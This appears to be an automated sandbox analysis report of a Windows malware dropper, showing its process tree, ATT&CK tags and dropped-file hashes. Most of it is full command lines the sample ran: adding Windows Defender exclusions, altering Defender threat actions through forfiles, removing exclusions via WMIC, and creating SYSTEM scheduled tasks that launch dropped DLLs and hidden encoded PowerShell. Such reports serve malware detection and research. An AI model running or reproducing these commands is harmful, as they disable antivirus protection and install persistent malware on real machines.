                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1616
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1580
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiVavEUuWbUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1760
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiVavEUuWbUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:940
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdWOdyGKahRU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:1644
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdWOdyGKahRU2" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:820
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVvqcCGcXqatFTEanDR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2192
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVvqcCGcXqatFTEanDR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2776
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdCKAPMjU" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2740
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdCKAPMjU" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2576
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryCjKLcUASjeC" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2236
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryCjKLcUASjeC" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2764
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zbVZwezRqQdbQsVB" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2716
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zbVZwezRqQdbQsVB" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2736
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:1572
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2964
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:3052
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2112
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2008
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2988
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gNlFRJgOC" /SC once /ST 01:22:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                3⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2828
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gNlFRJgOC"
                                                                3⤵
                                                                  PID:2704
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gNlFRJgOC"
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2148
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2348
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1808
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                  3⤵
                                                                    PID:2168
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                      4⤵
                                                                        PID:2272
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /CREATE /TN "lloAzDOsuszFGKMSg" /SC once /ST 04:35:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\GyCSmFAiAvfejamA\vWUiZCTWPqDpUzR\bfHCidb.exe\" HY /vnmudidvw 525403 /S" /V1 /F
                                                                      3⤵
                                                                      • Drops file in Windows directory
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:2496
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /run /I /tn "lloAzDOsuszFGKMSg"
                                                                      3⤵
                                                                        PID:776
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 600 -s 600
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Program crash
                                                                        PID:2320
                                                                    • C:\Windows\Temp\GyCSmFAiAvfejamA\vWUiZCTWPqDpUzR\bfHCidb.exe
                                                                      C:\Windows\Temp\GyCSmFAiAvfejamA\vWUiZCTWPqDpUzR\bfHCidb.exe HY /vnmudidvw 525403 /S
                                                                      2⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Drops Chrome extension
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1020
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                        3⤵
                                                                          PID:1728
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:572
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                                PID:828
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  6⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1684
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1948
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:2428
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:1976
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1852
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:1964
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:788
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      PID:2216
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1416
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          6⤵
                                                                                            PID:2268
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                        4⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2968
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                          5⤵
                                                                                            PID:1696
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1004
                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:468
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bGRMUcRlXIkCKIeoVz"
                                                                                        3⤵
                                                                                          PID:1072
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:908
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:888
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1076
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2096
                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    7⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2604
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:3048
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2708
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:708
                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    7⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1572
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qdCKAPMjU\YiXhUM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ljeKnLvLrPibFdu" /V1 /F
                                                                                            3⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:940
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "ljeKnLvLrPibFdu2" /F /xml "C:\Program Files (x86)\qdCKAPMjU\igHyVKy.xml" /RU "SYSTEM"
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1852
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /END /TN "ljeKnLvLrPibFdu"
                                                                                            3⤵
                                                                                              PID:2092
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "ljeKnLvLrPibFdu"
                                                                                              3⤵
                                                                                                PID:2376
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "HbiFDnbYstHeXi" /F /xml "C:\Program Files (x86)\OdWOdyGKahRU2\GDIlsJp.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2968
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "LoaenrtJMyyTl2" /F /xml "C:\ProgramData\zbVZwezRqQdbQsVB\jPOvlJY.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1920
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "QkygKvWRWnytSCBZb2" /F /xml "C:\Program Files (x86)\VVvqcCGcXqatFTEanDR\SIAxYOg.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2972
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "yQHeCLXSScShNsRUQmZ2" /F /xml "C:\Program Files (x86)\ryCjKLcUASjeC\RdHHIAo.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1616
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "nIHWTtLCWSsbZAuMo" /SC once /ST 03:06:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\GyCSmFAiAvfejamA\bhjBzADp\XmJUKNX.dll\",#1 /yEQdidUPrl 525403" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:916
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "nIHWTtLCWSsbZAuMo"
                                                                                                3⤵
                                                                                                  PID:1960
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "lloAzDOsuszFGKMSg"
                                                                                                  3⤵
                                                                                                    PID:1720
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 1560
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    PID:2836
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GyCSmFAiAvfejamA\bhjBzADp\XmJUKNX.dll",#1 /yEQdidUPrl 525403
                                                                                                  2⤵
                                                                                                    PID:2740
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\GyCSmFAiAvfejamA\bhjBzADp\XmJUKNX.dll",#1 /yEQdidUPrl 525403
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2784
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "nIHWTtLCWSsbZAuMo"
                                                                                                        4⤵
                                                                                                          PID:2112
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {B9766598-DA13-460B-A36D-1E0B3A905194} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
                                                                                                    1⤵
                                                                                                      PID:1536
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1608
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:2956
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2708
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:3052
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                            2⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1000
                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                              3⤵
                                                                                                                PID:2596
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:2384
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:2840
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:1868

                                                                                                                Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\OdWOdyGKahRU2\GDIlsJp.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        5f6192d8886f69a220ad8eb78905f242

                                                                                                                        SHA1

                                                                                                                        2eea4e257482051359a877ec2cad9e4845c51e42

                                                                                                                        SHA256

                                                                                                                        346ca1d83157bb7a01432eab82ee3f02e85428f8bf8d271f26d743b30e815818

                                                                                                                        SHA512

                                                                                                                        9e6271a2aaa2971f0ad8aedaac33a8fc39fb57416b90e209c49ed8dbc5a2e9e630625a355ad160727bffa613faa2c7aa898b5afe446794d83be4992a39ead85d

                                                                                                                      • C:\Program Files (x86)\VVvqcCGcXqatFTEanDR\SIAxYOg.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        f10ed4eeb8e33716f265631d468ca714

                                                                                                                        SHA1

                                                                                                                        415430ff9e9487fbd85f2dcf6e0a38436846ace5

                                                                                                                        SHA256

                                                                                                                        06518c3137ded3f5c3a280dd01c6141f104802ce037d5aff76111c7d761161d3

                                                                                                                        SHA512

                                                                                                                        d86ca682435ebb1c5c0b9c2c359f640523a8e3d70d7eb7c0c790641d9b5198ecd59bfc81db5ccfb91d20ae20da4c5708817f94da310a06f9306cdd327cb31e82

                                                                                                                      • C:\Program Files (x86)\qdCKAPMjU\igHyVKy.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        031a88272439abec2d67a9a144f77fd1

